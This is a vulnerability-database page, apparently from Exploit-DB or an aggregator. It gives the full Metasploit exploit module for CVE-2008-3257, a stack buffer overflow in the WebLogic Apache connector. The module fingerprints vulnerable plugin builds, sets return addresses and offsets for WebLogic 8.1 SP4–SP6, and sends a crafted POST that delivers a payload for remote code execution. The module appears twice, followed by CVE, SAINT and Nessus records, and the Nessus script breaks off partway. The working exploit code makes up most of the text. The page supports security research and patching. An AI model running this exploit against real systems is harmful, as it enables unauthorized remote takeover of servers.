Oracle Weblogic Apache Connector POST Request Buffer Overflow
2012-05-19T00:00:00
ID EDB-ID:18897 Type exploitdb Reporter metasploit Modified 2012-05-19T00:00:00
Description
Oracle Weblogic Apache Connector POST Request Buffer Overflow. CVE-2008-3257. Remote exploit for windows platform
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
HttpFingerprint = { :pattern => [ /Apache/ ] }
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle Weblogic Apache Connector POST Request Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in the BEA
Weblogic Apache plugin.
The connector fails to properly handle specially crafted HTTP POST
requests, resulting a buffer overflow due to the insecure usage
of sprintf. Currently, this module works over Windows systems without DEP,
and has been tested with Windows 2000 / XP.
In addition, the Weblogic Apache plugin version is fingerprinted with a POST
request containing a specially crafted Transfer-Encoding header.
},
'Author' =>
[
'KingCope', # Vulnerability Discovery and PoC
'juan vazquez', # Metasploit Module
],
'Version' => '$Revision: $',
'References' =>
[
[ 'CVE', '2008-3257' ],
[ 'OSVDB', '47096' ],
[ 'BID', '30273' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Privileged' => true,
'Platform' => 'win',
'Payload' =>
{
'Space' => 4000,
'BadChars' => "\x00\x0d\x0a\x3f"
},
'Targets' =>
[
[ 'Automatic', {} ],
[ 'BEA WebLogic 8.1 SP6 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',
{
'Ret' => 0x10061f63, # push esp # ret # mod_wl_20.so
'Offset' => 4102
}
],
[ 'BEA WebLogic 8.1 SP5 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',
{
'Ret' => 0x10061473, # push esp # ret # mod_wl_20.so
'Offset' => 4102
}
],
[ 'BEA WebLogic 8.1 SP4 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',
{
'Ret' => 0x10020e31, # push esp # ret # mod_wl_20.so
'Offset' => 4102
}
]
],
'DisclosureDate' => 'Jul 17 2008',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI path to a jsp or object provided by Weblogic', '/index.jsp']),
], self.class)
end
def check
fingerprint = fingerprint_mod_wl
case fingerprint
when /Version found/
return Exploit::CheckCode::Vulnerable
when /BEA WebLogic connector vulnerable/
return Exploit::CheckCode::Appears
when /BEA WebLogic connector undefined/
return Exploit::CheckCode::Detected
when /BEA WebLogic connector no vulnerable/, /BEA WebLogic connector not found/
return Exploit::CheckCode::Safe
end
end
def exploit
# Autodetect BEA mod_wl version
my_target = get_target
# Avoid the attack if the victim doesn't have the same setup we're targeting
if my_target.nil?
print_error("BEA mod_weblogic not supported")
return
end
uri = target_uri.path
sploit = rand_text_alphanumeric(my_target['Offset']-uri.length)
sploit << [my_target.ret].pack("V")
sploit << payload.encoded
send_request_cgi({
'method' => 'POST',
'uri' => "#{uri} #{sploit}",
})
handler
end
def get_target
return target if target.name != 'Automatic'
fingerprint = fingerprint_mod_wl
case fingerprint
when /BEA WebLogic 8.1 SP6 - mod_wl_20.so/
return targets[1]
when /BEA WebLogic 8.1 SP5 - mod_wl_20.so/
return targets[2]
when /BEA WebLogic 8.1 SP4 - mod_wl_20.so/
return targets[3]
else
return nil
end
end
def fingerprint_mod_wl
my_data = rand_text_alpha(rand(5) + 8)
res = send_request_cgi(
{
'method' => 'POST',
'uri' => target_uri.path,
'headers' =>
{
'Transfer-Encoding' => my_data
},
'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
})
if res and res.code == 200 and res.body =~ /Weblogic Bridge Message/
# BEA WebLogic 8.1 SP6 - mod_wl_20.so
case res.body
when (/Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and /Change Number:<\/B> <I>779586/)
return "Version found: BEA WebLogic 8.1 SP6 - mod_wl_20.so"
# BEA WebLogic 8.1 SP5 - mod_wl_20.so
when (/Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/ and /Change Number:<\/B> <I>616810/)
return "Version found: BEA WebLogic 8.1 SP5 - mod_wl_20.so"
when (/Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and /Change Number:<\/B> <I>452998/)
return "Version found: BEA WebLogic 8.1 SP4 - mod_wl_20.so"
# Check for dates prior to patch release
when /([A-Za-z]{3} [\s\d]{2} [\d]{4})/
build_date = Date.parse($1)
if build_date <= Date.parse("Jul 28 2008")
return "BEA WebLogic connector vulnerable"
else
return "BEA WebLogic connector no vulnerable"
end
else
return "BEA WebLogic connector undefined"
end
end
return "BEA WebLogic connector not found"
end
end
{"id": "EDB-ID:18897", "hash": "7aff689b35f6302232f4691520f08bad", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Oracle Weblogic Apache Connector POST Request Buffer Overflow", "description": "Oracle Weblogic Apache Connector POST Request Buffer Overflow. CVE-2008-3257. Remote exploit for windows platform", "published": "2012-05-19T00:00:00", "modified": "2012-05-19T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/18897/", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2008-3257"], "lastseen": "2016-02-02T10:39:39", "history": [], "viewCount": 17, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-3257"]}, {"type": "saint", "idList": ["SAINT:3731D876ADD116F969B63F8C1F9FB5C0", "SAINT:6763DC454040C45562777CCC7CC949A0", "SAINT:85AF372EEE4A6741D74279F33598EC73"]}, {"type": "nessus", "idList": ["WEBLOGIC_MOD_WL_OVERFLOW.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/BEA_WEBLOGIC_POST_BOF"]}, {"type": "exploitdb", "idList": ["EDB-ID:6089"]}, {"type": "cert", "idList": ["VU:716387"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:112864"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2008-100299", "ORACLE:CPUJAN2009-097901"]}], "modified": "2016-02-02T10:39:39"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/18897/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tHttpFingerprint = { :pattern => [ /Apache/ ] }\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Oracle Weblogic Apache Connector POST Request Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack based buffer overflow in the BEA\r\n\t\t\t\tWeblogic Apache plugin.\r\n\r\n\t\t\t\tThe connector fails to properly handle specially crafted HTTP POST\r\n\t\t\t\trequests, resulting a buffer overflow due to the insecure usage\r\n\t\t\t\tof sprintf. Currently, this module works over Windows systems without DEP,\r\n\t\t\t\tand has been tested with Windows 2000 / XP.\r\n\r\n\t\t\t\tIn addition, the Weblogic Apache plugin version is fingerprinted with a POST\r\n\t\t\t\trequest containing a specially crafted Transfer-Encoding header.\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'KingCope', # Vulnerability Discovery and PoC\r\n\t\t\t\t\t'juan vazquez', # Metasploit Module\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2008-3257' ],\r\n\t\t\t\t\t[ 'OSVDB', '47096' ],\r\n\t\t\t\t\t[ 'BID', '30273' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 4000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0d\\x0a\\x3f\"\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', {} ],\r\n\t\t\t\t\t[ 'BEA WebLogic 8.1 SP6 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x10061f63, # push esp # ret # mod_wl_20.so\r\n\t\t\t\t\t\t\t'Offset' => 4102\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'BEA WebLogic 8.1 SP5 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x10061473, # push esp # ret # mod_wl_20.so\r\n\t\t\t\t\t\t\t'Offset' => 4102\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'BEA WebLogic 8.1 SP4 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x10020e31, # push esp # ret # mod_wl_20.so\r\n\t\t\t\t\t\t\t'Offset' => 4102\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jul 17 2008',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('TARGETURI', [true, 'The URI path to a jsp or object provided by Weblogic', '/index.jsp']),\r\n\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\r\n\tdef check\r\n\r\n\t\tfingerprint = fingerprint_mod_wl\r\n\r\n\t\tcase fingerprint\r\n\t\twhen /Version found/\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\twhen /BEA WebLogic connector vulnerable/\r\n\t\t\treturn Exploit::CheckCode::Appears\r\n\t\twhen /BEA WebLogic connector undefined/\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\twhen /BEA WebLogic connector no vulnerable/, /BEA WebLogic connector not found/\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\t# Autodetect BEA mod_wl version\r\n\t\tmy_target = get_target\r\n\r\n\t\t# Avoid the attack if the victim doesn't have the same setup we're targeting\r\n\t\tif my_target.nil?\r\n\t\t\tprint_error(\"BEA mod_weblogic not supported\")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\turi = target_uri.path\r\n\t\tsploit = rand_text_alphanumeric(my_target['Offset']-uri.length)\r\n\t\tsploit << [my_target.ret].pack(\"V\")\r\n\t\tsploit << payload.encoded\r\n\r\n\t\tsend_request_cgi({\r\n\t\t\t'method' => 'POST',\r\n\t\t\t'uri' => \"#{uri} #{sploit}\",\r\n\t\t})\r\n\r\n\t\thandler\r\n\r\n\tend\r\n\r\n\tdef get_target\r\n\r\n\t\treturn target if target.name != 'Automatic'\r\n\r\n\t\tfingerprint = fingerprint_mod_wl\r\n\r\n\t\tcase fingerprint\r\n\t\twhen /BEA WebLogic 8.1 SP6 - mod_wl_20.so/\r\n\t\t\treturn targets[1]\r\n\t\twhen /BEA WebLogic 8.1 SP5 - mod_wl_20.so/\r\n\t\t\treturn targets[2]\r\n\t\twhen /BEA WebLogic 8.1 SP4 - mod_wl_20.so/\r\n\t\t\treturn targets[3]\r\n\t\telse\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\tend\r\n\r\n\tdef fingerprint_mod_wl\r\n\r\n\t\tmy_data = rand_text_alpha(rand(5) + 8)\r\n\t\tres = send_request_cgi(\r\n\t\t\t\t{\r\n\t\t\t\t\t'method' => 'POST',\r\n\t\t\t\t\t'uri' => target_uri.path,\r\n\t\t\t\t\t'headers' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Transfer-Encoding' => my_data\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t'data' => \"#{my_data.length}\\r\\n#{my_data}\\r\\n0\\r\\n\",\r\n\t\t\t\t})\r\n\r\n\t\tif res and res.code == 200 and res.body =~ /Weblogic Bridge Message/\r\n\t\t\t# BEA WebLogic 8.1 SP6 - mod_wl_20.so\r\n\t\t\tcase res.body\r\n\t\t\twhen (/Build date\\/time:<\\/B> <I>Jun 16 2006 15:14:11/ and /Change Number:<\\/B> <I>779586/)\r\n\t\t\t\treturn \"Version found: BEA WebLogic 8.1 SP6 - mod_wl_20.so\"\r\n\t\t\t# BEA WebLogic 8.1 SP5 - mod_wl_20.so\r\n\t\t\twhen (/Build date\\/time:<\\/B> <I>Aug 5 2005 11:19:57/ and /Change Number:<\\/B> <I>616810/)\r\n\t\t\t\treturn \"Version found: BEA WebLogic 8.1 SP5 - mod_wl_20.so\"\r\n\t\t\twhen (/Build date\\/time:<\\/B> <I>Oct 25 2004 09:25:23/ and /Change Number:<\\/B> <I>452998/)\r\n\t\t\t\treturn \"Version found: BEA WebLogic 8.1 SP4 - mod_wl_20.so\"\r\n\t\t\t# Check for dates prior to patch release\r\n\t\t\twhen /([A-Za-z]{3} [\\s\\d]{2} [\\d]{4})/\r\n\t\t\t\tbuild_date = Date.parse($1)\r\n\t\t\t\tif build_date <= Date.parse(\"Jul 28 2008\")\r\n\t\t\t\t\treturn \"BEA WebLogic connector vulnerable\"\r\n\t\t\t\telse\r\n\t\t\t\t\treturn \"BEA WebLogic connector no vulnerable\"\r\n\t\t\t\tend\r\n\t\t\telse\r\n\t\t\t\treturn \"BEA WebLogic connector undefined\"\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\treturn \"BEA WebLogic connector not found\"\r\n\r\n\tend\r\n\r\nend\r\n", "osvdbidlist": ["47096"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2017-09-29T14:26:00", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after \"POST /.jsp\" in an HTTP request.", "modified": "2017-09-28T21:31:36", "published": "2008-07-22T12:41:00", "id": "CVE-2008-3257", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3257", "title": "CVE-2008-3257", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2018-09-19T05:41:25", "bulletinFamily": "exploit", "description": "This module exploits a stack based buffer overflow in the BEA Weblogic Apache plugin. The connector fails to properly handle specially crafted HTTP POST requests, resulting a buffer overflow due to the insecure usage of sprintf. Currently, this module works over Windows systems without DEP, and has been tested with Windows 2000 / XP. In addition, the Weblogic Apache plugin version is fingerprinted with a POST request containing a specially crafted Transfer-Encoding header.", "modified": "2017-07-24T13:26:21", "published": "2012-05-17T08:28:18", "id": "MSF:EXPLOIT/WINDOWS/HTTP/BEA_WEBLOGIC_POST_BOF", "href": "", "type": "metasploit", "title": "Oracle Weblogic Apache Connector POST Request Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n HttpFingerprint = { :pattern => [ /Apache/ ] }\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle Weblogic Apache Connector POST Request Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack based buffer overflow in the BEA\n Weblogic Apache plugin.\n\n The connector fails to properly handle specially crafted HTTP POST\n requests, resulting a buffer overflow due to the insecure usage\n of sprintf. Currently, this module works over Windows systems without DEP,\n and has been tested with Windows 2000 / XP.\n\n In addition, the Weblogic Apache plugin version is fingerprinted with a POST\n request containing a specially crafted Transfer-Encoding header.\n },\n 'Author' =>\n [\n 'KingCope', # Vulnerability Discovery and PoC\n 'juan vazquez', # Metasploit Module\n ],\n 'References' =>\n [\n [ 'CVE', '2008-3257' ],\n [ 'OSVDB', '47096' ],\n [ 'BID', '30273' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Privileged' => true,\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'Space' => 4000,\n 'BadChars' => \"\\x00\\x0d\\x0a\\x3f\"\n },\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'BEA WebLogic 8.1 SP6 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',\n {\n 'Ret' => 0x10061f63, # push esp # ret # mod_wl_20.so\n 'Offset' => 4102\n }\n ],\n [ 'BEA WebLogic 8.1 SP5 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',\n {\n 'Ret' => 0x10061473, # push esp # ret # mod_wl_20.so\n 'Offset' => 4102\n }\n ],\n [ 'BEA WebLogic 8.1 SP4 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',\n {\n 'Ret' => 0x10020e31, # push esp # ret # mod_wl_20.so\n 'Offset' => 4102\n }\n ]\n ],\n 'DisclosureDate' => 'Jul 17 2008',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The URI path to a jsp or object provided by Weblogic', '/index.jsp']),\n ])\n\n end\n\n\n def check\n\n fingerprint = fingerprint_mod_wl\n print_status \"#{rhost}:#{rport} - #{fingerprint}\"\n\n case fingerprint\n when /Version found/\n return Exploit::CheckCode::Appears\n when /BEA WebLogic connector vulnerable/\n return Exploit::CheckCode::Appears\n when /BEA WebLogic connector undefined/\n return Exploit::CheckCode::Detected\n when /BEA WebLogic connector no vulnerable/, /BEA WebLogic connector not found/\n return Exploit::CheckCode::Safe\n end\n\n end\n\n def exploit\n\n # Autodetect BEA mod_wl version\n my_target = get_target\n\n # Avoid the attack if the victim doesn't have the same setup we're targeting\n if my_target.nil?\n print_error(\"BEA mod_weblogic not supported\")\n return\n end\n\n uri = normalize_uri(target_uri.path)\n sploit = rand_text_alphanumeric(my_target['Offset']-uri.length)\n sploit << [my_target.ret].pack(\"V\")\n sploit << payload.encoded\n\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => \"#{uri} #{sploit}\",\n })\n\n handler\n\n end\n\n def get_target\n\n return target if target.name != 'Automatic'\n\n fingerprint = fingerprint_mod_wl\n\n case fingerprint\n when /BEA WebLogic 8.1 SP6 - mod_wl_20.so/\n return targets[1]\n when /BEA WebLogic 8.1 SP5 - mod_wl_20.so/\n return targets[2]\n when /BEA WebLogic 8.1 SP4 - mod_wl_20.so/\n return targets[3]\n else\n return nil\n end\n\n end\n\n def fingerprint_mod_wl\n\n my_data = rand_text_alpha(rand(5) + 8)\n res = send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'headers' =>\n {\n 'Transfer-Encoding' => my_data\n },\n 'data' => \"#{my_data.length}\\r\\n#{my_data}\\r\\n0\\r\\n\",\n })\n\n if res and res.code == 200 and res.body =~ /Weblogic Bridge Message/\n # BEA WebLogic 8.1 SP6 - mod_wl_20.so\n case res.body\n when (/Build date\\/time:<\\/B> <I>Jun 16 2006 15:14:11/ and /Change Number:<\\/B> <I>779586/)\n return \"Version found: BEA WebLogic 8.1 SP6 - mod_wl_20.so\"\n # BEA WebLogic 8.1 SP5 - mod_wl_20.so\n when (/Build date\\/time:<\\/B> <I>Aug 5 2005 11:19:57/ and /Change Number:<\\/B> <I>616810/)\n return \"Version found: BEA WebLogic 8.1 SP5 - mod_wl_20.so\"\n when (/Build date\\/time:<\\/B> <I>Oct 25 2004 09:25:23/ and /Change Number:<\\/B> <I>452998/)\n return \"Version found: BEA WebLogic 8.1 SP4 - mod_wl_20.so\"\n # Check for dates prior to patch release\n when /([A-Za-z]{3} [\\s\\d]{2} [\\d]{4})/\n build_date = Date.parse($1)\n if build_date <= Date.parse(\"Jul 28 2008\")\n return \"BEA WebLogic connector vulnerable\"\n else\n return \"BEA WebLogic connector not vulnerable\"\n end\n else\n return \"BEA WebLogic connector undefined\"\n end\n end\n\n return \"BEA WebLogic connector not found\"\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/bea_weblogic_post_bof.rb"}], "saint": [{"lastseen": "2016-12-14T16:58:03", "bulletinFamily": "exploit", "description": "Added: 07/25/2008 \nCVE: [CVE-2008-3257](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3257>) \nBID: [30273](<http://www.securityfocus.com/bid/30273>) \nOSVDB: [47096](<http://www.osvdb.org/47096>) \n\n\n### Background\n\n[Oracle WebLogic Server](<http://www.bea.com/framework.jsp?CNT=index.htm&FP=/content/products/weblogic/>) (formerly BEA WebLogic Server) is a Java web application platform. \n\n### Problem\n\nA buffer overflow in the Apache Connector for WebLogic Server allows remote attackers to execute arbitrary commands by sending a long, specially crafted POST request. \n\n### Resolution\n\nApply a fix when available. \n\n### References\n\n<http://secunia.com/advisories/31146/> \n\n\n### Limitations\n\nExploit works on WebLogic Server 10.0. On Windows Server 2003, patch KB933729 (rpcrt4.dll version 5.2.3790.4115) must be installed. \n\n### Platforms\n\nWindows 2000 \nWindows Server 2003 \n \n\n", "modified": "2008-07-25T00:00:00", "published": "2008-07-25T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/weblogic_apache_connector_post", "id": "SAINT:3731D876ADD116F969B63F8C1F9FB5C0", "title": "Oracle WebLogic Server Apache Connector POST buffer overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-10-03T15:01:53", "bulletinFamily": "exploit", "description": "Added: 07/25/2008 \nCVE: [CVE-2008-3257](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3257>) \nBID: [30273](<http://www.securityfocus.com/bid/30273>) \nOSVDB: [47096](<http://www.osvdb.org/47096>) \n\n\n### Background\n\n[Oracle WebLogic Server](<http://www.bea.com/framework.jsp?CNT=index.htm&FP=/content/products/weblogic/>) (formerly BEA WebLogic Server) is a Java web application platform. \n\n### Problem\n\nA buffer overflow in the Apache Connector for WebLogic Server allows remote attackers to execute arbitrary commands by sending a long, specially crafted POST request. \n\n### Resolution\n\nApply a fix when available. \n\n### References\n\n<http://secunia.com/advisories/31146/> \n\n\n### Limitations\n\nExploit works on WebLogic Server 10.0. On Windows Server 2003, patch KB933729 (rpcrt4.dll version 5.2.3790.4115) must be installed. \n\n### Platforms\n\nWindows 2000 \nWindows Server 2003 \n \n\n", "modified": "2008-07-25T00:00:00", "published": "2008-07-25T00:00:00", "id": "SAINT:6763DC454040C45562777CCC7CC949A0", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/weblogic_apache_connector_post", "type": "saint", "title": "Oracle WebLogic Server Apache Connector POST buffer overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:21", "bulletinFamily": "exploit", "description": "Added: 07/25/2008 \nCVE: [CVE-2008-3257](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3257>) \nBID: [30273](<http://www.securityfocus.com/bid/30273>) \nOSVDB: [47096](<http://www.osvdb.org/47096>) \n\n\n### Background\n\n[Oracle WebLogic Server](<http://www.bea.com/framework.jsp?CNT=index.htm&FP=/content/products/weblogic/>) (formerly BEA WebLogic Server) is a Java web application platform. \n\n### Problem\n\nA buffer overflow in the Apache Connector for WebLogic Server allows remote attackers to execute arbitrary commands by sending a long, specially crafted POST request. \n\n### Resolution\n\nApply a fix when available. \n\n### References\n\n<http://secunia.com/advisories/31146/> \n\n\n### Limitations\n\nExploit works on WebLogic Server 10.0. On Windows Server 2003, patch KB933729 (rpcrt4.dll version 5.2.3790.4115) must be installed. \n\n### Platforms\n\nWindows 2000 \nWindows Server 2003 \n \n\n", "modified": "2008-07-25T00:00:00", "published": "2008-07-25T00:00:00", "id": "SAINT:85AF372EEE4A6741D74279F33598EC73", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/weblogic_apache_connector_post", "title": "Oracle WebLogic Server Apache Connector POST buffer overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:11:08", "bulletinFamily": "scanner", "description": "The Apache web server running on the remote host includes a version of the WebLogic plug-in for Apache (mod_wl) that is affected by a buffer overflow. This is an Apache module included with Oracle (formerly BEA) WebLogic Server and used to proxy requests from an Apache HTTP server to WebLogic. A remote attacker can leverage this issue to execute arbitrary code on the remote host. \n\nNote that Nessus has not tried to exploit this issue but rather has only checked the affected module's build timestamp. As a result, it will not detect if the remote implements one of the workarounds published by Oracle in its advisory. Still, it should be noted that the vendor strongly recommends updating the plug-in.", "modified": "2018-08-06T00:00:00", "id": "WEBLOGIC_MOD_WL_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=33932", "published": "2008-08-18T00:00:00", "title": "Oracle WebLogic Server mod_wl POST Request Remote Overflow", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(33932);\n script_version(\"1.22\");\n\n script_cve_id(\"CVE-2008-3257\");\n script_bugtraq_id(30273);\n script_xref(name:\"CERT\", value:\"716387\");\n script_xref(name:\"EDB-ID\", value:\"6089\");\n script_xref(name:\"Secunia\", value:\"31146\");\n\n script_name(english:\"Oracle WebLogic Server mod_wl POST Request Remote Overflow\");\n script_summary(english:\"Sends a POST request to get the plug-in's build timestamp\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a module that is affected by a buffer\noverflow vulnerability.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The Apache web server running on the remote host includes a version of\nthe WebLogic plug-in for Apache (mod_wl) that is affected by a buffer\noverflow. This is an Apache module included with Oracle (formerly BEA)\nWebLogic Server and used to proxy requests from an Apache HTTP server\nto WebLogic. A remote attacker can leverage this issue to execute\narbitrary code on the remote host. \n\nNote that Nessus has not tried to exploit this issue but rather has\nonly checked the affected module's build timestamp. As a result, it\nwill not detect if the remote implements one of the workarounds\npublished by Oracle in its advisory. Still, it should be noted that\nthe vendor strongly recommends updating the plug-in.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install the latest web server plug-in as described in the vendor\nadvisory above.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle Weblogic Apache Connector POST Request Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/08/18\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_set_attribute(attribute:\"cpe\",value:\"cpe:/a:oracle:weblogic_server\");\nscript_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:80);\nif (!get_port_state(port)) exit(0);\n\n\n# Make sure the banner looks like Apache.\nbanner = get_http_banner(port:port);\nif (\n !banner || \n !egrep(pattern:\"^Server:.*(Apache|Oracle HTTP Server|IBM_HTTP_SERVER|IBM_HTTP_Server)\", string:banner)\n) exit(0);\n\n\n# Iterate over known directories.\ndirs = get_kb_list(string(\"www/\", port, \"/content/directories\"));\nif (isnull(dirs)) dirs = make_list(\"\", \"/weblogic\");\n\nforeach dir (dirs)\n{\n # Look for the plug-in and a bridge message.\n url = string(dir, \"/index.jsp\");\n\n res = http_send_recv3(method:\"GET\", item:url, port:port);\n if (res == NULL) exit(0);\n\n # nb: if there's a problem with configured WebLogic server, the initial\n # request results in a bridge message we can use to 